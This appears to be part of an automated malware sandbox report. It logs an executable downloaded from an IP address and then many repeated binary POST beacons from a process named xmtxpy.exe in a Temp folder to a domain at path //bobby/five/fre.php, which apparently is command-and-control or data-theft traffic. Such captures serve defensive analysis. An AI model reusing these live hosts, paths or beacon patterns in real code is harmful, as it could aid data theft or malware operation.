                    Accept: */*
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: 198.46.132.195
                    Connection: Keep-Alive
                    Feb 10, 2022 10:21:50.385209084 CET1INHTTP/1.1 200 OK
                    Date: Thu, 10 Feb 2022 09:21:50 GMT
                    Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                    Last-Modified: Thu, 10 Feb 2022 03:31:37 GMT
                    ETag: "480d4-5d7a1966fd8a9"
                    Accept-Ranges: bytes
                    Content-Length: 295124
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: application/x-msdownload
                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c9 cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5a 00 00 00 d4 01 00 00 04 00 00 25 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 59 00 00 00 10 00 00 00 5a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 c0 02 00 00 0a 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$uJ$$$/{$%:$"y$7$f"$Rich$PELHZ%2p@sp.textvYZ `.rdatap^@@.datap@.ndata@.rsrct@@


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.2249166172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:21:59.753804922 CET312OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 176
                    Connection: close
                    Feb 10, 2022 10:21:59.836230040 CET313INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:21:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B14QjzK93WN7FMCRwgPdBoL4GvyuLTCNzn128gIE66EmvAljQdFfNPOn5qPxQ8nApBsPYHTSjURn1ssUf9vIO%2F1OL2%2BdI5plkWkZzNc4H79V9rsVWKoyCfjhFO%2FkqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4453c8e679137-FRA
                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    10192.168.2.2249175104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:11.483872890 CET328OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:11.594872952 CET329INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=thdM9Np%2FCdPYSURDbhixX%2FX8u4tEOLZU%2FvVuDbDE134sivqgwq%2BaJfoO5vJ0tXiBljYm%2FC%2F30qIj93fbRfKfXGvl%2BpAnC9Vf%2FlfUUZamRBGfzlQvLCoIxHh%2BgetLJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44585da166940-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    11192.168.2.2249176172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:12.553925991 CET330OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:12.721690893 CET331INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BEFEhIgHNjdPe%2Fupr%2FEP7FioCKDN%2BQkotKPjVJOS%2Frml7qplaroEnTQz1FIinV2XsHaS%2FI7nUqbPdpg00nvPfbyrD1nl6xKScXbaQFyDSbzbSQdRqYsZkYL%2FaMhgSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4458c8c24904f-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    12192.168.2.2249177104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:13.627098083 CET332OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:13.718802929 CET333INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KXNvxjzVfF4hz0T9dBMVDpRewCBTbhWivG59MXcrMq3Fz0H3HqGx%2F5DX%2Bne%2B%2FFccTkhD5ws8ZgjI27n620j0vO0mLN2fs3T3gcOiTbX8ownTlbqimc3Co0pX0aSa4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445933dcd9247-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    13192.168.2.2249178172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:14.784465075 CET334OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:14.920140982 CET335INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NVUp%2BcxarDGGCShA6A3fVGNJKlQzMKQTikn%2FmGyj3943bP7FxgEz5bihNVsOHsU3DbxzwdZ03uFPNgUbs9%2F0oEhIIT0nnSYYifUkfynsl2OJVPJCYFOqol8oHQboIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4459a7c04694c-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    14192.168.2.2249179172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:15.879811049 CET335OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:15.963191986 CET336INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YywndWPDbt1nWWBUZyOXzJTtQd6vv4%2FE1Tker%2B341XUrk33CDyk4IMaSDz5n%2BK2atL0VK3i5tDkfDiWK6GJ%2F3hUlhDHcf%2Fn6Pch6y%2FzzAYpnP5BzB5pzhQW97EcSSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445a1484f90e0-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    15192.168.2.2249180172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:17.221999884 CET337OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:17.311069012 CET338INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UjFRYEW1vf5tlCFa1f1vwHKik1aRVbAIBpy1RMsjGKnLW4Qrm9vJ89Nrs6dLqDWMcgVmBrYxiuG%2FUeCxjisf7RsLjasp6QzHWLM4TEeZkFdIUloz%2B3B9BJnC3ZRzZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445a9aa3b9249-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    16192.168.2.2249181172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:18.584774971 CET339OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:18.688278913 CET340INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KHC3Edk5h9AYeBTw4zi6GBAjPXoz6AEM7UyHRy8hW3je7zgNBBmtdwVwGpiSZh81JKEYltIiJgER6JT21WX3XjM2N0XFbkBnufuzgMA76%2Bp7Xcs80ietpmWj4LHaRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445b23bfc8fec-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    17192.168.2.2249182172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:20.304832935 CET341OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:20.398272991 CET342INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QULp3ZlAMhwUjANw1YvL4%2BMJk9Z%2FbESFzhJWPA0iK5uawopHl0uiRldRAdRBGHJQS%2BTh9FZdQ4ZFWsS9QSIa12g5o6LPT8XtnzGfCgSERqmR9OTXY0oGiJOB7t3gug%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445bcfe999158-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    18192.168.2.2249183172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:21.371169090 CET342OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:21.466526985 CET343INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jiD84uKNL21I2ykVJEfn%2Fe2gpHIc0bS1RI%2FxuxHXAll6ytxzAqIMdpyZN%2FG8qWdDRDaJWS8n4CpPnVVPzZ%2BUtnIhRTImE9cuCSP7f%2BgqcZKxN4KBiYwynSKxXPUruQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445c39a1192b3-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    19192.168.2.2249184172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:22.490195036 CET344OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:22.588881016 CET345INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IYa8QLbJBtkMewci%2Fy3c8YjBFq4dsPE33C%2B67GR4NBQNLJZRdPOw48%2FtcUb%2BG8a9XxJsc%2FLHxAkXJbNtsVOHlmNJ8KgW%2BxJlAyE6l%2FjEcOW2fEoq4xgfX4aQ5RZPHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445ca9c095c5c-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    2192.168.2.2249167172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:02.840347052 CET314OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 176
                    Connection: close
                    Feb 10, 2022 10:22:02.975469112 CET315INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYIeoMifwVUCSlJ5xQ%2FPPGpv3kxeM8Le4fFZcBSBNQE%2F00nQuzz6hHD2E4yzDxCDvC4GoHGHI7XDrLhEy10sRiqxImrim07qG7zifuLYaSXjE11cVB6vD4NlHq2qFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4454fc86b917d-FRA
                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    20192.168.2.2249185104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:23.504559040 CET346OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:23.595321894 CET347INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sM0ogIKfjYVzx%2F54CqSfhjTPc7gH6ECGRuTp6F6Pr791MX1PGLDWaUif41h1edR%2Bl8fsnqA1lYGZ15EqZyjj3xPhB0TdXiYdmWCIYNqlsiw0OjpK0OItnrzqYCRU8w%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445d0fcca9217-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    21192.168.2.2249186104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:24.588293076 CET348OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:24.674747944 CET349INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=16XyyasiijTs3mtooXtiXEBC3sVd%2FX3IpmrXnVgvAF7rYQXutsuLPMsIWRmqeVqbfgT1uHpXHgFEG6cA94%2Bl1vC5elQ%2F7riyngPQJHQv7Taa1Xkm5yxHj1vPsREEwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445d7baaa91f3-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    22192.168.2.2249187172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:25.593017101 CET350OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:25.698025942 CET351INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lZXOqBbo1prOUCtgEa8VHKBOX3aiUpw4bwcinIO5LwxwVfvhzB3YO83i0Uy1VUFZYvJDn%2BFVM2Qbb2QX9GH1gNr8iN7INb%2BqvuODkDJIVQrU84Oc3fT4Y6qVHDQFlw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445ddfbe390f4-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    23192.168.2.2249188172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:26.671474934 CET351OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:26.773804903 CET352INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z6CwJYTVGa3AnJcsAqL3zNlmjIgfexUkjM4cyDshIwsGRdfYIgN3bflXQh2onteNJ926X8WPY94crt1e3EfkgcxXiKtHHMa5TzW7hc2Hyll4xmtK3kqtsPyKPeb2HQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445e4bcca91ed-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    24192.168.2.2249189172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:27.690156937 CET353OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:27.795358896 CET354INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
